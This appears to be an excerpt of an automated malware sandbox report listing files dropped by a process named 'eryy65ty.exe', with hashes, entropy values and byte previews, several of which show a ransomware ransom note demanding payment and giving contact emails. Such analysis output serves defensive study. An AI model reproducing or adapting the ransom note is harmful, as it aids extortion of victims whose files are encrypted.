                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2330
                                                                                                                                              Entropy (8bit):7.911655545876427
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:DBrj3oiTvcSmOKyLpcJl4nGuWea459/55wnpC+nFoDdZl9LG7x7EShxLYs:DBnvvcStKgpcJlYpWedL/52w+nFWdVUt
                                                                                                                                              MD5:22C0C82D9BA2D24A9671D757DCAA069F
                                                                                                                                              SHA1:3D4F784A5EF3DCD6E39644F04A0EAA07469BD1B3
                                                                                                                                              SHA-256:F15ACB5FAF85C07F06B0C6C7D4F0618C4589F8B6ADA5FD2172AD0BF49F295762
                                                                                                                                              SHA-512:D0F86BCB8041F06F840BF0560BA2E10AF6DFC3E813E8ECC8ED5C5F46BF8FF2D89AD7C0B94755105D5DB1C052DA087917E8D8FD3761ED2C50D3E9BCBD493183AC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.D..../.a y.S9..M..J...'k.m2'.C.k.E.....^W.0z.G+G..5....+=#....@.w.q.[....k...8....?..SU.....i#......F?D#.....j.(..y..}.>.uZJ0......_..b.t.R.x..v.x.A...l&.`.W2.?....i&T......2.......U..:v.1.......\..=.-.%q.Eu..6z.b....Vw.B|w....J#..j/..y.w..y.1nv...r..iN).HH.}..+..P+/...E..r.We.@y:.. )3(..x}.3[..Z..Jq.d...r.&.p...]`!..N...H.%IIa.f5#.....C...:..g5...._\.y4&...}I...Y.y..~.....M......b./...+.4$."...V,.j...8mZ...c.@R.#et...J..E..2d.#../....8_.w5.<*1.e...Q.X;{;.%....E...d.6..V4..}..K.....z...5M.w\.nw...H#3l}y.9..z1.N...y[_....F..{:.c]n....4...W.._//...{....$=........<..f.wlK...."........r.woQ.....`M..B......gv~..8.4.L.Z....>.v'.+~......@.R.~2.....V...._F.......\..N.OPX]...2..8.B.....~4gH.3..4<R..f/.)}..&....R.....[....~.;<x.0.L..[4r.EOc..#S.GQ....Xal.7...U..2J.W.1..A..].g...H=<.U.......qe.35.(l.R......y.)}~ ..s..[\...KYV..k...D..3.-7.s.(..F.!..p..~...D.m..u)\q...&.....j.r.....lE.v.T.....8........;..._T..;.=.5....._r...W..(#.6...=.$.i.<..9+#....*
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2330
                                                                                                                                              Entropy (8bit):7.911655545876427
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:DBrj3oiTvcSmOKyLpcJl4nGuWea459/55wnpC+nFoDdZl9LG7x7EShxLYs:DBnvvcStKgpcJlYpWedL/52w+nFWdVUt
                                                                                                                                              MD5:22C0C82D9BA2D24A9671D757DCAA069F
                                                                                                                                              SHA1:3D4F784A5EF3DCD6E39644F04A0EAA07469BD1B3
                                                                                                                                              SHA-256:F15ACB5FAF85C07F06B0C6C7D4F0618C4589F8B6ADA5FD2172AD0BF49F295762
                                                                                                                                              SHA-512:D0F86BCB8041F06F840BF0560BA2E10AF6DFC3E813E8ECC8ED5C5F46BF8FF2D89AD7C0B94755105D5DB1C052DA087917E8D8FD3761ED2C50D3E9BCBD493183AC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.D..../.a y.S9..M..J...'k.m2'.C.k.E.....^W.0z.G+G..5....+=#....@.w.q.[....k...8....?..SU.....i#......F?D#.....j.(..y..}.>.uZJ0......_..b.t.R.x..v.x.A...l&.`.W2.?....i&T......2.......U..:v.1.......\..=.-.%q.Eu..6z.b....Vw.B|w....J#..j/..y.w..y.1nv...r..iN).HH.}..+..P+/...E..r.We.@y:.. )3(..x}.3[..Z..Jq.d...r.&.p...]`!..N...H.%IIa.f5#.....C...:..g5...._\.y4&...}I...Y.y..~.....M......b./...+.4$."...V,.j...8mZ...c.@R.#et...J..E..2d.#../....8_.w5.<*1.e...Q.X;{;.%....E...d.6..V4..}..K.....z...5M.w\.nw...H#3l}y.9..z1.N...y[_....F..{:.c]n....4...W.._//...{....$=........<..f.wlK...."........r.woQ.....`M..B......gv~..8.4.L.Z....>.v'.+~......@.R.~2.....V...._F.......\..N.OPX]...2..8.B.....~4gH.3..4<R..f/.)}..&....R.....[....~.;<x.0.L..[4r.EOc..#S.GQ....Xal.7...U..2J.W.1..A..].g...H=<.U.......qe.35.(l.R......y.)}~ ..s..[\...KYV..k...D..3.-7.s.(..F.!..p..~...D.m..u)\q...&.....j.r.....lE.v.T.....8........;..._T..;.=.5....._r...W..(#.6...=.$.i.<..9+#....*
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1290
                                                                                                                                              Entropy (8bit):7.866648710952893
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:yCoOA1VAmBiFSvcM4xeM4ZB3O+xLB8zSocDc07iCaYOzya4cUXd:ypOADBiFcUxb4ZE+xLBvocIbCaLF4hXd
                                                                                                                                              MD5:7CD61FA031F338AAD53DB7D1B46229FA
                                                                                                                                              SHA1:432A61B5E622B6C85675CEECBE815559A451D81B
                                                                                                                                              SHA-256:BFD6123AD82B24F3EED5E43641870F56026252DC7C9EEDD41746AE17C5B3FE47
                                                                                                                                              SHA-512:43B21085D5DF11CD6A38028D0E8B6C103EF667837BA9AC3E0B761D1C56320098DF355FF3CD14289E955744AA033D22CB96F7685B08A9EFC082AD868FC396792B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:]..*<...5..0...U...fI.+sP..6.....!.*0...s.6./..|...Q..g...-.gV...Q..6.=..#..#..:...!.....s.<..jS...}.|O.D..0...$?F.....Y....HZ.....y...>.Sd....5.n.8....p."n.|...9..p;../.5......4]OO..55..1.."......R....y.6........X...-...k..v...1.`...E...e.Oa5.........^^B...C...9.'.4.5... .......2..a+.../.ZS.......1|.H.....n[C.N....7......G.o.wy.......Y.rb..#.4u.i2<..eI\y.4Q.!...}.cV3.......zc.zl.....MtD..:F_...L......tm,$.m&..7.....Ch...cz.?v)..|.w..p..q...=j......w5.*.ev3.z7B..,._s...p...4)..Z|.;S/......O...&'..6^.mo.....8..V.......#L..}E$.wHR.k9$....U.GT...#R1....N...w.....>.b'w.f.b..y...i.u.ae....4.....[..M?...J.])T..c.?K....'......S...JC...>BJ:...u..)n{..)./9^..$W..S!I(J..y.D..@..H.d..PXK..y I....V..F./.Z.K]R.{.`z.k.........+7..c...*ij,.(:...m.4.....Z...h..4.a...e.=p@.*;.8u9j.1/iG..@.....h....8$.p...E.uM8.ea..J.3..E.9..v..&..Z....y........I.%`.q..[.U..g......aKn.....,..\...:/..y....DV.mC...,...rG....T..Y.y.[+.;W<.No...(O.V.&.z...7.. .a%~gSG......X.n.:..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1290
                                                                                                                                              Entropy (8bit):7.866648710952893
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:yCoOA1VAmBiFSvcM4xeM4ZB3O+xLB8zSocDc07iCaYOzya4cUXd:ypOADBiFcUxb4ZE+xLBvocIbCaLF4hXd
                                                                                                                                              MD5:7CD61FA031F338AAD53DB7D1B46229FA
                                                                                                                                              SHA1:432A61B5E622B6C85675CEECBE815559A451D81B
                                                                                                                                              SHA-256:BFD6123AD82B24F3EED5E43641870F56026252DC7C9EEDD41746AE17C5B3FE47
                                                                                                                                              SHA-512:43B21085D5DF11CD6A38028D0E8B6C103EF667837BA9AC3E0B761D1C56320098DF355FF3CD14289E955744AA033D22CB96F7685B08A9EFC082AD868FC396792B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:]..*<...5..0...U...fI.+sP..6.....!.*0...s.6./..|...Q..g...-.gV...Q..6.=..#..#..:...!.....s.<..jS...}.|O.D..0...$?F.....Y....HZ.....y...>.Sd....5.n.8....p."n.|...9..p;../.5......4]OO..55..1.."......R....y.6........X...-...k..v...1.`...E...e.Oa5.........^^B...C...9.'.4.5... .......2..a+.../.ZS.......1|.H.....n[C.N....7......G.o.wy.......Y.rb..#.4u.i2<..eI\y.4Q.!...}.cV3.......zc.zl.....MtD..:F_...L......tm,$.m&..7.....Ch...cz.?v)..|.w..p..q...=j......w5.*.ev3.z7B..,._s...p...4)..Z|.;S/......O...&'..6^.mo.....8..V.......#L..}E$.wHR.k9$....U.GT...#R1....N...w.....>.b'w.f.b..y...i.u.ae....4.....[..M?...J.])T..c.?K....'......S...JC...>BJ:...u..)n{..)./9^..$W..S!I(J..y.D..@..H.d..PXK..y I....V..F./.Z.K]R.{.`z.k.........+7..c...*ij,.(:...m.4.....Z...h..4.a...e.=p@.*;.8u9j.1/iG..@.....h....8$.p...E.uM8.ea..J.3..E.9..v..&..Z....y........I.%`.q..[.U..g......aKn.....,..\...:/..y....DV.mC...,...rG....T..Y.y.[+.;W<.No...(O.V.&.z...7.. .a%~gSG......X.n.:..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2341
                                                                                                                                              Entropy (8bit):7.912018771566822
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:vZtg8bZWzTGhwVI5xOvF38G3jK1MLDMm4bImylV2PBnFrkzt:vjZWzUSeO9re1MLQEmNn9at
                                                                                                                                              MD5:DD0DB8FCB2F3E125AF7FDD92C0F49D04
                                                                                                                                              SHA1:A16C4283947777D4E71ED183179EDCE899D54D37
                                                                                                                                              SHA-256:7544EC13674648FBF9C9DB9783D6EA96FDE6A39ECCEED21662AD429CF77171D3
                                                                                                                                              SHA-512:F6596A613B1ECD99802DADE1B26D6AC62C64C76FA22879A4A3422D2BEEA54F60ED6F9330EDF519F6F5352D9DD8E512A81B44090040E34D29CE8E435C208A994A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..(....C.6..T.....v}Y..0..E,Z.U..].O.....,"X...t.k.6r.zi...N....#AC9..>jI.......e.#.C,..cN),......3.%.Cc..<.U=.. .-..cNL..:.#^.a_.=.......{...t.CSzi7K.e0.3.l.2.].Ph..e..8......k.G.E!.ZQi....SC..Z.c.o...O.|\.....2..TP.uN...........f......rJK.d.<..~./......3.J.......w.z.....h&..~...B....||..&:......v).e5.L.....=.YS.q.....To]..........X..rz.f.'..,H$....$...@.M...K.....H.)rn.. (.u..RF.rb...m.. \/m5U.&..^.k.......y..........A...2....TY..#;...s%<[>.......}4A.B.....'...w.".u....B48i...q.X..N.m...3l...lr...... .b] ...+.%...' .1|^^..&....b.MO.u.W...v.o.... .......i..h....L.........b...;.O..g.7.|...G...!....U9.j5.e..q..gZ.r./~..&.&....K.#...c....-A).3..]JP..Q^.U....W....X...t1...n......{..8.n._.\&.A..).^J8h'.....d.Z.Q...+..S...D.L6..)..xYq...9...x...V.AY0.].t.l....R9....d?..;...._...!..2.2..4t.>..B....)v.+.....O.w-..K[.C^..r...D.....r.....O.6_..R ..m.X..K...[,...V.c.h..7=..........9....U....B.Twt/j...u..#M...c.1^.....O.......|./.h....RM
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2341
                                                                                                                                              Entropy (8bit):7.912018771566822
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:vZtg8bZWzTGhwVI5xOvF38G3jK1MLDMm4bImylV2PBnFrkzt:vjZWzUSeO9re1MLQEmNn9at
                                                                                                                                              MD5:DD0DB8FCB2F3E125AF7FDD92C0F49D04
                                                                                                                                              SHA1:A16C4283947777D4E71ED183179EDCE899D54D37
                                                                                                                                              SHA-256:7544EC13674648FBF9C9DB9783D6EA96FDE6A39ECCEED21662AD429CF77171D3
                                                                                                                                              SHA-512:F6596A613B1ECD99802DADE1B26D6AC62C64C76FA22879A4A3422D2BEEA54F60ED6F9330EDF519F6F5352D9DD8E512A81B44090040E34D29CE8E435C208A994A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..(....C.6..T.....v}Y..0..E,Z.U..].O.....,"X...t.k.6r.zi...N....#AC9..>jI.......e.#.C,..cN),......3.%.Cc..<.U=.. .-..cNL..:.#^.a_.=.......{...t.CSzi7K.e0.3.l.2.].Ph..e..8......k.G.E!.ZQi....SC..Z.c.o...O.|\.....2..TP.uN...........f......rJK.d.<..~./......3.J.......w.z.....h&..~...B....||..&:......v).e5.L.....=.YS.q.....To]..........X..rz.f.'..,H$....$...@.M...K.....H.)rn.. (.u..RF.rb...m.. \/m5U.&..^.k.......y..........A...2....TY..#;...s%<[>.......}4A.B.....'...w.".u....B48i...q.X..N.m...3l...lr...... .b] ...+.%...' .1|^^..&....b.MO.u.W...v.o.... .......i..h....L.........b...;.O..g.7.|...G...!....U9.j5.e..q..gZ.r./~..&.&....K.#...c....-A).3..]JP..Q^.U....W....X...t1...n......{..8.n._.\&.A..).^J8h'.....d.Z.Q...+..S...D.L6..)..xYq...9...x...V.AY0.].t.l....R9....d?..;...._...!..2.2..4t.>..B....)v.+.....O.w-..K[.C^..r...D.....r.....O.6_..R ..m.X..K...[,...V.c.h..7=..........9....U....B.Twt/j...u..#M...c.1^.....O.......|./.h....RM
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1802
                                                                                                                                              Entropy (8bit):7.872084150641424
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2jauf2TZinChbIiPoPQQHjO/zylQBN0MxSsa83h5el:Uf2TZiHiPog/zylaN0eSM4
                                                                                                                                              MD5:BE341488AD9DDF06287416B0A370A978
                                                                                                                                              SHA1:8EAD3B6F88214BB06256984FD74A048F462C47E4
                                                                                                                                              SHA-256:44E7C7865708878311B80BB6E7D97150801F42CD3F3EDD04F0ABF582DCCA4F84
                                                                                                                                              SHA-512:22EDD112C4F1C9F95B1AA94705FC8D62A24F9706A99783FB540F6E2D40D843B70A48FE54A96015318AE1B5A0F863E41BF03AB54D0ABE1020D9D3030A4F82DCBC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........|h...S3Q6.t...........8..?...ip......1D..@.....4.&.(..$*................d..c.....h.^.9......1..)....pB....:.<D.h.c../.%.UW......>3\hZD..x...@.i.....A8..$.Z.m..Qq*V..c..?S...`..\...#;$%.6b.^).X}'a....v...n.....8...w.9.E!P.Q..Y.yJ.F..T../.....G....Fz.vb.b.C...)#........F.......>kbs....F1.G8.Z..Le...@..&J=..n:...a.O...*./...b.o....$.5h....g..p.^..^.&.].....MVy.ES8[W.nr..-T...c.=.....F.7o...R.xoX....f....b..`...;.....57..]...@7..|!..1./.x..v.......U...8....l...>.LE>..Q.;...e...%.K.....;..q..l}..<p.JI...c..........9....p.gB".*v..Hw.2..b...+......1'.g..2..]o.Bs...F........./..5O...l9.k8.SeT...Y..Z..F.@.X<8......7a..z....2m.._Og..G<2..4...p.!...].F......%&...{.q....t..s_..-.^.6e.R 7........./i..1..o.+Y7.`...U.).%1}.....i..%..........6.....A.BqJ.a.$.J....au.pZ.~....)....Ps1.6...#gM.1.Mq..<.k.X...[.&p....._4...;.....Q^V,..).La8..};)......Tb..=.<(.Z.u...H.}.o..4.ODl.&.....Ppt^......b!...e .......W...<t........w....K*0..~.. `..-..8.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1802
                                                                                                                                              Entropy (8bit):7.872084150641424
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2jauf2TZinChbIiPoPQQHjO/zylQBN0MxSsa83h5el:Uf2TZiHiPog/zylaN0eSM4
                                                                                                                                              MD5:BE341488AD9DDF06287416B0A370A978
                                                                                                                                              SHA1:8EAD3B6F88214BB06256984FD74A048F462C47E4
                                                                                                                                              SHA-256:44E7C7865708878311B80BB6E7D97150801F42CD3F3EDD04F0ABF582DCCA4F84
                                                                                                                                              SHA-512:22EDD112C4F1C9F95B1AA94705FC8D62A24F9706A99783FB540F6E2D40D843B70A48FE54A96015318AE1B5A0F863E41BF03AB54D0ABE1020D9D3030A4F82DCBC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........|h...S3Q6.t...........8..?...ip......1D..@.....4.&.(..$*................d..c.....h.^.9......1..)....pB....:.<D.h.c../.%.UW......>3\hZD..x...@.i.....A8..$.Z.m..Qq*V..c..?S...`..\...#;$%.6b.^).X}'a....v...n.....8...w.9.E!P.Q..Y.yJ.F..T../.....G....Fz.vb.b.C...)#........F.......>kbs....F1.G8.Z..Le...@..&J=..n:...a.O...*./...b.o....$.5h....g..p.^..^.&.].....MVy.ES8[W.nr..-T...c.=.....F.7o...R.xoX....f....b..`...;.....57..]...@7..|!..1./.x..v.......U...8....l...>.LE>..Q.;...e...%.K.....;..q..l}..<p.JI...c..........9....p.gB".*v..Hw.2..b...+......1'.g..2..]o.Bs...F........./..5O...l9.k8.SeT...Y..Z..F.@.X<8......7a..z....2m.._Og..G<2..4...p.!...].F......%&...{.q....t..s_..-.^.6e.R 7........./i..1..o.+Y7.`...U.).%1}.....i..%..........6.....A.BqJ.a.$.J....au.pZ.~....)....Ps1.6...#gM.1.Mq..<.k.X...[.&p....._4...;.....Q^V,..).La8..};)......Tb..=.<(.Z.u...H.}.o..4.ODl.&.....Ppt^......b!...e .......W...<t........w....K*0..~.. `..-..8.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5898
                                                                                                                                              Entropy (8bit):7.432080511583106
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:+8SXESQKbXQcvDT56ENMY41PePJft1qFPyX5DtUdReY:+h0XhcvhMYrft1eu5DtUdv
                                                                                                                                              MD5:D045E9FE0107BD834C243CC668E53F3C
                                                                                                                                              SHA1:4C47E68FFE463A74EFFE4411640B44791C3B6375
                                                                                                                                              SHA-256:71EAC5C781AADC4787317C540405B00425D5DB85C5F3AB3C26FD4326ADABFD8F
                                                                                                                                              SHA-512:DD4C125B40621819D2B33A9D00B258394A382E823F17EA22FA90D5985AF0D42A96F9A5F45A20567F81900EE776F7558A812DD9AD2DB3BBAEF0A87B0DA8E9EC2E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:6...=....<....._s............^#._...-w..w.^....P.>BC.....I.ivJ.qH.............U.m...0..g8.y...>.....P....+...0.(=.....Ur.w=....imq........3}..'..|k.....'.F.*...V"...@WY..Y..pu.V.c..\....)......{w.,.3.j..+..f......~.?.'_z5-Qp..).....[lI6..t!.x....x!J.X...n?E.X....o"=6.#Dt.!9.1..g......f"..u.tP..8e^=9...../....&.,.}.l.}U.CJ..\...Y..=..k.+..s./.S..{......d...).v.=.h.E,....i....5Vf/..>..3...o.....`.~G~...K.C.5.a...d...`....T..X}..#...$.~......n....#.....).E.j1Cb...6.HW8'..uqvu../....~Q..VE...2d!...Fj..$[..B..>.<("x-...+.gn...o..x.{%>....(W..f.K.6r...8...jM...sx.F$..U.... f...#.La.&E...T.H...4ce..>....;D....Z&G.[..T..;..z-...l.b..G..G.Y...Ez...Q.\......'}t.....`,.d...`.KjQV..#W.....2.!.P...O..{~g...u<6 ..o....=...9ZJ.~wp.....M..YF.....".W.-.'......N<.........t....K.5.qt\..2.7i....[x.Z.}.....6@{W.>...!#l.}..j....A....d5T.k..p..I.#..Vv.]3...n..-..}s..(C.-..J;~].G.{-..J..?0...X.0<.....Y...%..I....:5"+*.....Ws_C..A...B.@7.S.j"*...8~...EBm.8..5....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5898
                                                                                                                                              Entropy (8bit):7.432080511583106
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:+8SXESQKbXQcvDT56ENMY41PePJft1qFPyX5DtUdReY:+h0XhcvhMYrft1eu5DtUdv
                                                                                                                                              MD5:D045E9FE0107BD834C243CC668E53F3C
                                                                                                                                              SHA1:4C47E68FFE463A74EFFE4411640B44791C3B6375
                                                                                                                                              SHA-256:71EAC5C781AADC4787317C540405B00425D5DB85C5F3AB3C26FD4326ADABFD8F
                                                                                                                                              SHA-512:DD4C125B40621819D2B33A9D00B258394A382E823F17EA22FA90D5985AF0D42A96F9A5F45A20567F81900EE776F7558A812DD9AD2DB3BBAEF0A87B0DA8E9EC2E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:6...=....<....._s............^#._...-w..w.^....P.>BC.....I.ivJ.qH.............U.m...0..g8.y...>.....P....+...0.(=.....Ur.w=....imq........3}..'..|k.....'.F.*...V"...@WY..Y..pu.V.c..\....)......{w.,.3.j..+..f......~.?.'_z5-Qp..).....[lI6..t!.x....x!J.X...n?E.X....o"=6.#Dt.!9.1..g......f"..u.tP..8e^=9...../....&.,.}.l.}U.CJ..\...Y..=..k.+..s./.S..{......d...).v.=.h.E,....i....5Vf/..>..3...o.....`.~G~...K.C.5.a...d...`....T..X}..#...$.~......n....#.....).E.j1Cb...6.HW8'..uqvu../....~Q..VE...2d!...Fj..$[..B..>.<("x-...+.gn...o..x.{%>....(W..f.K.6r...8...jM...sx.F$..U.... f...#.La.&E...T.H...4ce..>....;D....Z&G.[..T..;..z-...l.b..G..G.Y...Ez...Q.\......'}t.....`,.d...`.KjQV..#W.....2.!.P...O..{~g...u<6 ..o....=...9ZJ.~wp.....M..YF.....".W.-.'......N<.........t....K.5.qt\..2.7i....[x.Z.}.....6@{W.>...!#l.}..j....A....d5T.k..p..I.#..Vv.]3...n..-..}s..(C.-..J;~].G.{-..J..?0...X.0<.....Y...%..I....:5"+*.....Ws_C..A...B.@7.S.j"*...8~...EBm.8..5....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
